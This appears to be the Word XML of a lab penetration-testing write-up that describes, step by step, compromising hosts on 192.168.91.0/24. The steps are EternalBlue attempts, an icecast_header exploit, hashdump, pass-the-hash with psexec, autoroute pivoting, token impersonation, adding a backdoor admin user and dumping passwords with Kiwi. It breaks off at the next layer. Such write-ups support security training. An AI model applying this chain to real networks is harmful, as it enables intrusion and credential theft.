          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D256341" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRDefault="00426FE3" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B5A5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Level 2 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal Foraging and Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2EB0F" w14:textId="35B57B44" w:rsidR="0013187F" w:rsidRPr="0013187F" w:rsidRDefault="00426FE3" w:rsidP="0069083C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identical to Level 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EE7C8C" w14:textId="6F033A5D" w:rsidR="0069083C" w:rsidRDefault="00E203B6" w:rsidP="0069083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Layer 1</w:t>
      </w:r>
      <w:r w:rsidR="0069083C" w:rsidRPr="00264200"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 xml:space="preserve"> 172.17.17.203 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E203B6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19</w:t>
      </w:r>
      <w:r w:rsidR="000762AE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.168.91.</w:t>
      </w:r>
      <w:r w:rsidR="006D534F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">0/24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CAF8C" w14:textId="77777777" w:rsidR="0069083C" w:rsidRDefault="0069083C" w:rsidP="0069083C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55575989" w14:textId="2B5974CF" w:rsidR="0069083C" w:rsidRDefault="00E203B6" w:rsidP="0069083C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial exploit</w:t>
      </w:r>
      <w:r w:rsidR="006D534F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (19</w:t>
      </w:r>
      <w:r w:rsidR="000762AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="006D534F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.168.91.203)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1312C825" w14:textId="77777777" w:rsidR="0069083C" w:rsidRPr="003C27E4" w:rsidRDefault="0069083C" w:rsidP="0069083C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F555F3" w14:textId="30026713" w:rsidR="00EB71E5" w:rsidRDefault="008524A2" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Firstly, started </w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:t>eternal</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>blue (ms17)</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve"> but</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> failed due to target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B573EE" w14:textId="77777777" w:rsidR="00EB71E5" w:rsidRPr="00EB71E5" w:rsidRDefault="00EB71E5" w:rsidP="00EB71E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="353F664D" w14:textId="71E6DC4F" w:rsidR="00EB71E5" w:rsidRDefault="00EB71E5" w:rsidP="0069083C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="409EA4B5" wp14:editId="0027865F">
            <wp:extent cx="4962525" cy="1057187"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="16043323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32382" name="Picture 1" descr="A screen shot of a computer cod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902" cy="106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7C91" w14:textId="5479779A" w:rsidR="00EB71E5" w:rsidRDefault="00EB71E5" w:rsidP="0069083C">
      <w:r>
        <w:t>Figure: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C0548B" w14:textId="7AF19F2F" w:rsidR="00625FFC" w:rsidRDefault="008524A2" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then tried icecast_header </w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t>with which I was able to successfully g</w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t>t into the system</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t xml:space="preserve">did </w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t>hashdum</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t xml:space="preserve">to get </w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve">credentials and before I can proceed any </w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t>further connection</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve"> died. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B78622" w14:textId="77777777" w:rsidR="00625FFC" w:rsidRPr="00625FFC" w:rsidRDefault="00625FFC" w:rsidP="00625FFC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C01AFA" w14:textId="048480AD" w:rsidR="00625FFC" w:rsidRDefault="00625FFC" w:rsidP="00625FFC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4915AE" wp14:editId="6C0C251B">
            <wp:extent cx="5419725" cy="1976231"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="767998725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98725" name="Picture 2" descr="A computer screen with white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687" cy="198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A5AB" w14:textId="0045CF15" w:rsidR="00625FFC" w:rsidRDefault="00625FFC" w:rsidP="00625FFC">
      <w:r>
        <w:t>Figure: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71733487" w14:textId="59B66811" w:rsidR="00661E4C" w:rsidRDefault="00495FA7" w:rsidP="00426FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>So, n</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve">ow that I had the </w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from hashdump, I</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve">used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB71E5">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve"> (ms17) to pass the hash </w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>Admin</w:t>
      </w:r>
      <w:r>
        <w:t>istrator”</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t>and got a stable connection. Looked in the system to find t</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5" w:rsidRPr="00EB71E5">
        <w:t>okens</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve"> but none were </w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>useful</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FAFCCB" w14:textId="77777777" w:rsidR="00426FE3" w:rsidRDefault="00661E4C" w:rsidP="00495FA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>hen I</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve"> r</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve"> autoro</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="00EB71E5">
        <w:t xml:space="preserve">te </w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve">to the network (192.168.91.0/24). </w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t>While</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t xml:space="preserve">my </w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>teammate</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t xml:space="preserve"> were </w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t>scan</w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t>ning</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve"> the 192.168.92.0/24 network</w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t>started looking</w:t>
      </w:r>
      <w:r w:rsidR="00625FFC">
        <w:t xml:space="preserve"> for trophies on 91.203</w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B1B9CB" w14:textId="6B16E924" w:rsidR="00625FFC" w:rsidRDefault="00625FFC" w:rsidP="00495FA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Couldn’t find any, so went to look for any other available systems on the 192.168.91.0/24 network. Found 91.1 and 91.22</w:t>
      </w:r>
      <w:r w:rsidR="00D23CA2">
        <w:t xml:space="preserve"> using Nmap via the proxy chain created through the second terminal and scanned for port 445.</w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t xml:space="preserve"> (Figure: 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098580C7" w14:textId="75143F3A" w:rsidR="00625FFC" w:rsidRDefault="00625FFC" w:rsidP="00625FFC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24CA8C08" wp14:editId="72060574">
            <wp:extent cx="4191000" cy="1757444"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18145258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25828" name="Picture 18145258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092" cy="179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5EF7" w14:textId="0D0BEBDE" w:rsidR="006D534F" w:rsidRDefault="006D534F" w:rsidP="00625FFC">
      <w:r>
        <w:t>Figure: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0608314A" w14:textId="77777777" w:rsidR="006D534F" w:rsidRDefault="006D534F" w:rsidP="00625FFC"/>
    <w:p w14:paraId="562F87FB" w14:textId="7AF915E4" w:rsidR="006D534F" w:rsidRDefault="006D534F" w:rsidP="006D534F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pivoting to 19</w:t>
      </w:r>
      <w:r w:rsidR="000762AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">.168.91.22 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51877F68" w14:textId="77777777" w:rsidR="006D534F" w:rsidRDefault="006D534F" w:rsidP="00625FFC"/>
    <w:p w14:paraId="460EBB32" w14:textId="1893607B" w:rsidR="00625FFC" w:rsidRDefault="00625FFC" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After finding them asked my teammate to attack 91.1, I went </w:t>
      </w:r>
      <w:r w:rsidR="006D534F">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r>
        <w:t>91.22.</w:t>
      </w:r>
      <w:r w:rsidR="006D534F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D23CA2">
        <w:t>Firstly,</w:t>
      </w:r>
      <w:r w:rsidR="006D534F">
        <w:t xml:space="preserve"> I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D534F">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D534F">
        <w:t xml:space="preserve"> with admin credentials but for some reason exploit didn’t create a session. So, tried ms17 version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D534F">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D534F">
        <w:t xml:space="preserve"> which worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDBAA27" w14:textId="40319264" w:rsidR="006D534F" w:rsidRDefault="006D534F" w:rsidP="006D534F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="246B21CC" wp14:editId="57FD3E1D">
            <wp:extent cx="4724400" cy="2021682"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="975648870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48870" name="Picture 4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644" cy="207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6CE8" w14:textId="666DE95C" w:rsidR="006D534F" w:rsidRDefault="006D534F" w:rsidP="006D534F">
      <w:r>
        <w:t>Figure: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03883BDC" w14:textId="288E0E7F" w:rsidR="00625FFC" w:rsidRDefault="006D534F" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Here found “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jeff</w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” token. Using incognito, </w:t>
      </w:r>
      <w:r w:rsidRPr="006D534F">
        <w:t>impersonate</w:t>
      </w:r>
      <w:r>
        <w:t>d as Jeff</w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t>re</w:t>
      </w:r>
      <w:r>
        <w:t>y created a shell and a</w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t>dd a new</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> admin user</w:t>
      </w:r>
      <w:r w:rsidR="00495FA7">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00495FA7">
        <w:t>sujit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00495FA7">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t xml:space="preserve"> with password “MAGno5678”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608704A3" w14:textId="3D7059DA" w:rsidR="006D534F" w:rsidRDefault="006D534F" w:rsidP="006D534F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A33D577" wp14:editId="46B6E899">
            <wp:extent cx="2409825" cy="968108"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1624575059" name="Picture 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75059" name="Picture 5" descr="A black screen with white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64" cy="10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9C09A" wp14:editId="2B110343">
            <wp:extent cx="3381375" cy="964559"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1232567868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67868" name="Picture 6" descr="A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023" cy="9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FD24" w14:textId="05521BEF" w:rsidR="00D23CA2" w:rsidRDefault="006D534F" w:rsidP="006D534F">
      <w:r>
        <w:t>Figure: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2134E2" w14:textId="4577C97B" w:rsidR="00D23CA2" w:rsidRDefault="00D23CA2" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that I had access to the “MEDINASOD” server, Looked through the system to find any useful information. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D47E73C" w14:textId="465BB911" w:rsidR="006D534F" w:rsidRDefault="00D23CA2" w:rsidP="00D23CA2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="006D67D0" wp14:editId="3FE40E9A">
            <wp:extent cx="2171700" cy="1085851"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="111531050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10507" name="Picture 7" descr="A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090" cy="10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FD5DBF5" wp14:editId="4CC440FB">
            <wp:extent cx="2952750" cy="1039237"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1043704716" name="Picture 8" descr="A black screen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04716" name="Picture 8" descr="A black screen with white text and number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712" cy="106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005A" w14:textId="1CFC6731" w:rsidR="00D23CA2" w:rsidRDefault="00D23CA2" w:rsidP="00D23CA2">
      <w:r>
        <w:t>Figure: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BB13F4" w14:textId="1A773690" w:rsidR="00F30355" w:rsidRDefault="00D23CA2" w:rsidP="00F30355">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then after looking into the network 91.22 is also connected to 192.168.92.0/24 network so I created autoroute to the netw</w:t>
      </w:r>
      <w:r w:rsidR="00F30355">
        <w:t>ork. (Figure: 6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E42A8B" w14:textId="3E1C4167" w:rsidR="00F30355" w:rsidRDefault="00F30355" w:rsidP="00F30355">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And using </w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t xml:space="preserve">inbuild extension </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Kiwi” found Jeffrey password </w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00661E4C">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F30355">
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SecureString5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1993ED" w14:textId="5040C33E" w:rsidR="00F30355" w:rsidRDefault="00F30355" w:rsidP="00F30355">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F8EF631" wp14:editId="259AD4D7">
            <wp:extent cx="3019425" cy="1402356"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="161382312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23122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836" cy="14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CB56" w14:textId="278CDA43" w:rsidR="00F30355" w:rsidRDefault="00F30355" w:rsidP="00F30355">
      <w:r>
        <w:t>Figure: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E37E17B" w14:textId="2870B669" w:rsidR="00D23CA2" w:rsidRDefault="00F30355" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Now </w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">we have access to </w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">92 </w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t xml:space="preserve">network </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">did </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> build-in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00661E4C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00661E4C">
        <w:t>arp_scanner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00661E4C">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>because the proxy chain is causing some errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E2B1FF" w14:textId="77777777" w:rsidR="00F30355" w:rsidRDefault="00F30355" w:rsidP="00F30355"/>
    <w:p w14:paraId="4BAE3B7D" w14:textId="5FA0FD1C" w:rsidR="00F30355" w:rsidRDefault="00F30355" w:rsidP="00F30355">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Layer 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00264200"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 xml:space="preserve"> 19</w:t>
      </w:r>
      <w:r w:rsidR="000762AE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.168.</w:t>
      </w:r>
      <w:r w:rsidR="007A4D53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>91</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="007A4D53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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E203B6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19</w:t>
      </w:r>
      <w:r w:rsidR="000762AE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.168.9</w:t>
      </w:r>
      <w:r w:rsidR="007A4D53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.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36975B9A" w14:textId="77777777" w:rsidR="007A4D53" w:rsidRDefault="007A4D53" w:rsidP="007A4D53"/>
    <w:p w14:paraId="1467AE6D" w14:textId="5A90C88E" w:rsidR="007A4D53" w:rsidRDefault="007A4D53" w:rsidP="007A4D53">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial exploit (19</w:t>
      </w:r>
      <w:r w:rsidR="000762AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.168.92.32)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C7563E" w14:textId="77777777" w:rsidR="007A4D53" w:rsidRDefault="007A4D53" w:rsidP="007A4D53"/>
    <w:p w14:paraId="5FA19083" w14:textId="2E764045" w:rsidR="00F30355" w:rsidRDefault="00F30355" w:rsidP="00EB71E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
